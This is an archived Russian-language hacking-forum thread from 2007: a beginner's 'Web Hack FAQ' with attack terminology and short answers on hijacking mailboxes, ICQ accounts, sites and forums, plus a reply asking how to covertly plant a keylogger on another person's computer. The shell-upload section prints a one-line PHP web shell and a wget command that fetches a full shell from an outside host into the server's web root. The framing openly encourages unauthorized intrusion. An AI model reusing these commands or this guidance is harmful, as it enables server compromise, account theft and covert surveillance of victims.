1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

Xaker.Name Web Hack FAQ v1.0 by Koller & Helkern

Тема в разделе "Web-хакинг, уязвимости CMS, эксплоиты", создана пользователем Хел, 10 окт 2007.

  1. Хел

    Хел ..::V.I.P::..

    Регистрация:
    15 ноя 2006
    Сообщения:
    0
    Симпатии:
    202
    Баллы:
    0
    [ Xaker.Name Web Hack FAQ v1.0 by Koller & Helkern ]

    Приветствую тебя, новичок в ремесле взломщика! Ты, наверное, часто задаешь себе вопросы: "Как это они делают? Как ломаются сайты? Как угнать почту? Как узнать пароль? Как проникнуть на сервер?" И еще много "как". Сегодня мы постараемся дать тебе ответы на самые распространенные "как" в веб хакинге. Расскажем немного об устройстве сетей, о уязвимостях в веб приложениях (то бишь сайтах), об уязвимостях серверов. Итак, приступаем...

    [ Вступление ]

    Поразмышляем, кто такой хакер, тот, кем ты хочешь стать. Благодаря СМИ мы знаем, что это злые дядьки, которые сидят за своими супермощными компьютерами и ломают как орешки правительствинные сервера. А кто же они на самом деле?

    В основном это 15-20 летние подростки и юноши (или девушки, что реже, хотя попадаются экземпляры, которые дадут фору любому Биллу Гейтсу), интересующиеся всем, что связанно с их железным другом - компьютером. Будем считать так, поскольку в разные времена хакерыми называли разных людей. Сначала это были "приколисты", которые делали интересные подколки и штучки - хаки. Дальше это были телефонные взломщики - они находили уязвимости в телефонных линиях и могли разговаривать пркатически забесплатно. Теперь же это - компьютерные энтузиасты, которых считают уголовниками. Вообще хакер это тот, кто гуру в определенной сфере, например в посадке цветочков. Сейчас же их считают киберпреступниками, способными залезть в любую сеть... Нет, отрицать нельзя - разные люди имеют разные цели и по разному используют свои знания. Например, человек умеющий владеть пистолетом может идти ограбить банк или же служить в правоохранительных огранах - две крайности одной сущности. Также и хакеры - одни помогают администриторам, а другие получают выгоду за счет своих "черных дел". Так что какой путь избрать - дело сугубо личное, и никто не смеет оспорить его...

    Итак, выяснив, кто такой этот "хакер", надо поговорить о терминах, используемых в этой сфере. Ведь в чужой монастырь со своим уставом не придешь. Необходимо знать также компьютерный сленг. Приступим...

    [ Термины и сленг компьютерного мира ]


    :: Общие понятия ::

    Hacker, хакер, хеккер, хек - человек, занимающийся всем тем, что здесь описано. Подробнее см. выше.

    Lamer, ламер, ламерок, лам, ламо - человек, противоположный хакеру. Чаще всего является жертвой взломщиков.

    Server, сервер - объект атаки хакеров. Чаще всего располагает на себе множество сайтов. Такой сервер будет у хостеров.

    Bud, баг, уязвимость - недокументированная возможность, дающая возможность хакеру получить при определенных условиях доступ на сервере, последующее поднятие прав.

    Botnet, ботнет - сеть компьютеров-жертв под управлением хакера. Чаще всего протроянизированные (см. ниже троян). Используется для DDoS'а серверов (см. ниже DDoS, DoS).

    Google, гугл, гугль - это поисковая система, лучший друг и напарник хакера. Самое большое количество уязвимостей находится именно через него. Его можно найти по адресу www.google.com.

    Bruteforce, брутфорс, брут - метод атаки, заключающийся в полном переборе паролей на определенный сервис. Переводится как грубая сила. Различается на брут по словарю и брут прямым перебором.

    Fake, фейк, фака - метод атаки из разновидности социальной инженерии (СИ, смотрите ниже), подразумевает обман пользователя путем создания точь в точь похожего ресурса на манер субъекта преступления, т.е., например, создание фейкового mail.ru сервера, где если пользователь введет свои входные данные, они буду перенаправлены фишеру.

    Phishing, фишинг, фишер - метод атаки и человек, см. выше о фейке (аналог).

    :: Уязвимости ::

    SQL Injection, sql инъекция, скуля - это уязвимость, позволяющая удаленному пользователю составлять запросы к базе данных сервера. Различаются типы SQL инъекций по базам данных: Oracle, MySQL, PostgreSQL, MSSQL, etc. Самые частые из них это MySQL, MSSQL, PostgreSQL injections. Подробнее о простейших MySQL инъекциях и об остальных инъекциях[/ur].

    XSS, межсайтовый скриптинг, ксс, ксска - это уязвимость, которая позволяет взаймодействовать с браузером пользователя. Разделяется на активную и пассивную. При активной XSS хакер может не взаймодействовать с пользователем напрямую, эксплойт (см. далее что это такое) загружается на сервер, что исключает подозрения со сторону жертвы. Пассивная, соответственно, имеет более "палевный" эффект.
    Подробнее о XSS, о продвинутых XSS и о методах обхода фильтрации при XSS.

    Include bug, инклуд, инклюд - это уязвимость, позвляющая управлять файловой системой сервера. Различается на удаленную и локальную. При удаленной есть возможность подключить веб шелл (см. ниже что это такое), а при локальной только лишь возможность просмотра файлов. Подробнее о PHP инъекциях..., о том, что дает возможность просмотра файлов на сервере.

    DoS, дос - метод атаки (Denial of Service), позволяющий "положить" сервер. Используется только в крайних случаях. Зачастую требует больших вычислительных ресурсов.

    DDoS, ддос - метод атаки (Distributed Denial of Service), позволяющий распределить количество ресурсов для атаки на сервер. См. выше DoS. Используется чаще всего при ботнете (см. выше подробнее о ботнете).

    СИ, социальная инженерия - метод атаки на самое уязвимое звено системы - человека. Подробнее о нем можно почитать в книге The Art Of Deception гуру СИ Кевина Митника.

    :: Программы ::

    Exploit, sploit, сплоит, эксплоит - программа, позволяющая автоматизировать процесс эксплуатирования уязвимости. Различаются на удаленный и локальный, в зависимости от типа уязвимости. Локальные следует загружать на сервер, удаленные можно запускать с собственной машины. Подробнее об эксплоитах на примере форума.

    Shell, шелл, оболочка - это программа, позволяющая управлять удаленно взломанным сервером. Различаются веб шеллы (web shells), биндшеллы (bindshells), бэкдоры (backdoors) и другие. По порядку. Веб шелл - это программа, написанная на языке веб программирования (PHP, Perl, ASP, etc), позволяющая управлять сервером через браузер. Биндшелл - это программа, занимающая порт на сервере (подробнее о портах ниже) и позволяющая работать через него. Бэкдор - это аналог биндшелла, или программа, при определенных условиях дающая права администратора (root), иногда называют руткитами (rootkits).

    Malware, вирус, троян - распространенная категория вредоносных программ, позволяющих получить доступ на сервер. Вирусы зачастую используют какие то уязвимости, эксплуатируют их, а затем подгружают трояна. Троян - тип вируса, позволяющий получить управление сервером, зачастую отсылает конфиденциальную информацию взломщику.

    Sniffer, сниффер - программа, отслеживающая сетевой траффик. Используется для получения конфиденциальной информации, для определения различных свойств сети.

    Bruteforcer, брутфорсер, брутер - программа, перебирающая пароли к сервису. См. выше Bruteforce.

    Script, скрипт - набор команд, программа. Используются для веба. Пишутся на различных языках, например на PHP, Perl, ASP, javascript, python, etc.

    Языки веб программирования - список языков, нужных для понимания веб уязвимостей:

    - PHP
    - Perl
    - JavaScript
    - Ruby
    - Python
    - ASP

    Итак, немного разобрались с терминами (они будут постоянно дополняться), теперь вереходим к F.A.Q.'у по веб хакингу...

    [ F.A.Q. ]

    Рассмотрим следующие часто задаваемые вопросы:


    - Как взломать ящик?
    - Как взломать сайт?
    - Как взломать форум?
    - Что такое сплоит?
    - Как использовать сплоит?
    - Как найти нужную информацию?
    - Как угнать аську?
    - Как найти SQL inj и проэксплуатировать ее?
    - Как найти XSS и проэксплуатировать ее?
    - Как найти Inlude и проэксплуатировать его?
    - Как сбрутить что-то?
    - Как залить шелл?


    Как взломать ящик?[\b]

    Ну для начала смотрим на каком сервере расположена данная услуга (почтовик а не взлом). Если это крупный сервер, типа mail.ru & yandex.ru, то здесь лучше брутить. Для брута существуют специальные программы, которые вы можете найти в разделе веб хака. Просто все уязвимости этих серверов лежат в основном в привате и достать их обычному человеку достаточно тяжело. Если же сервер не частоиспользуемый, то можно попытаться найти баги самому. Одна из часто используемых багов - это XSS (см. выше о ней), информацию о ней можно найти ниже по факу. Также возможно использовать атаку типа фейк, или же просто сбрутить ящик.

    Как взломать сайт?

    Что подразумевается под взломом сайта? Это перехват управления, т.е. админки или фтп доступа. Все это делается с помощью уязвимостей в системе. Их несколько типов: основные ошибки в скриптах (SQL injection, XSS, Include bug, подробнее о них см. в факе), ошибки серверного обеспечения (сетевые программы, например веб сервер, фтп сервер и иже с ними), человеческий фактор. Подробнее об основных ошибках в скриптах было описано выше, эксплуатировать же серверные уязвимости сложнее. Его для незнающих можно эксплуатировать сплоитами. О человеческом факторе говорит книга Кевина Митника. Подробнее об аспектах взлома серверов.

    Как взломать форум?

    Для начала определимся, какой версии форум. Если это публичный движок, то идем на любой сайт с багтраком (www.milw0rm.com, www.securitylab.ru, www.securityfocus.com, www.xakep.ru) и ищем версию форума. При удачном раскладе мы найдем сплоит. Что это аткое и как его есть рассказано ниже. Если же движок самописный или нераспространенный, то ищем баги сами.

    Что такое сплоит?

    Что такое сплоит, см. в разделе "Термины и сленг компьютерного мира". Про его использование см. там же.

    Как найти нужную информацию?

    Начинающий хакер должен знать, что его напарник и друг - это Гугль (www.google.com). См. выше кто это такое, а вот подробнее о эффективном поиске. Также есть специальная программа с алиасами запросов - Google Hacker & G00glink.

    Как угнать аську?

    О методах угона уинов можно говорить бесконечно долго. Подробнее...

    Как найти SQL inj и проэксплуатировать ее?

    Что такое SQL Injection, см. выше, также ссылки на статьи о методах ее эксплуатации см. выше.

    Как найти XSS и проэксплуатировать ее?

    Что такое XSS, см. выше, также ссылки на статьи о методах эксплуатации см. выше.

    Как найти Inlude и проэксплуатировать его?

    Что такое Include bug, см. выше.

    Как сбрутить что-то?

    Мы говорили о брутфорсе как о методе, позволяющем при имении больших ресурсов добиться больших успехов. Брутить можно все что угодно, от аси до мыла, но есть также еще и хеши (см. выше что это). Подробнее статью о них можно прочитать, а также сбрутить неподдающийся вам хеш можно здесь, о тактике расшифрования читаем тут.

    Как залить шелл?

    Залитие шелла - последний этап во внешнем аудите сайта, по сути его результат. Залить шелл можно разными путями, самый легкий - админка с функцией аплоада. В других случаях придется искать любой форум, в них через функцию заливки разных файлов, например смайлов, можно залить и скрипт. На крайний случай ищем, допустим, редактор страниц или новостей. Вставляем, наприме PHP код (все зависит от используемого интерпретатора), например:
    Код:
    <?php system($_GET["cmd"]); ?>
    который сделает мини-шелл, через него заливаем полноценный шелл:
    Код:
    wget -O /usr/loca/apache/htdocs/shell.php http://vasya.narod.ru/shell.txt
    это при использовании wget'а, также можно самому написать простейший аналог вгета, либо использовать аналог вгета.

    :: Данный FAQ будет пополняться со временем ::

    (c) Helkern & Koller
    http://Xaker.Name


    --------------------------------------------------------------------------

    Релиз xaker.name.team
     
    Последнее редактирование: 23 дек 2007
    7 пользователям это понравилось.
  2. Cor$air

    Cor$air Продвинутый

    Регистрация:
    16 авг 2006
    Сообщения:
    0
    Симпатии:
    25
    Баллы:
    0
  3. Хел

    Хел ..::V.I.P::..

    Регистрация:
    15 ноя 2006
    Сообщения:
    0
    Симпатии:
    202
    Баллы:
    0
    Cor$air,
    ммм....тег почему то не сработал =(
     
  4. фаридос_бабаев

    фаридос_бабаев Новичок

    Регистрация:
    28 сен 2009
    Сообщения:
    1
    Симпатии:
    0
    Баллы:
    0
    Добрый день, а как (если вообще возможно) запустить на чужой комп КГБ кейлоггер? Не имея прямого доступа к нему? Я имею ввиду через ссылку или как еще....

    Добавлено через 1 минуту
    Очень жду ответа
     
    Последнее редактирование: 28 сен 2009

Поделиться этой страницей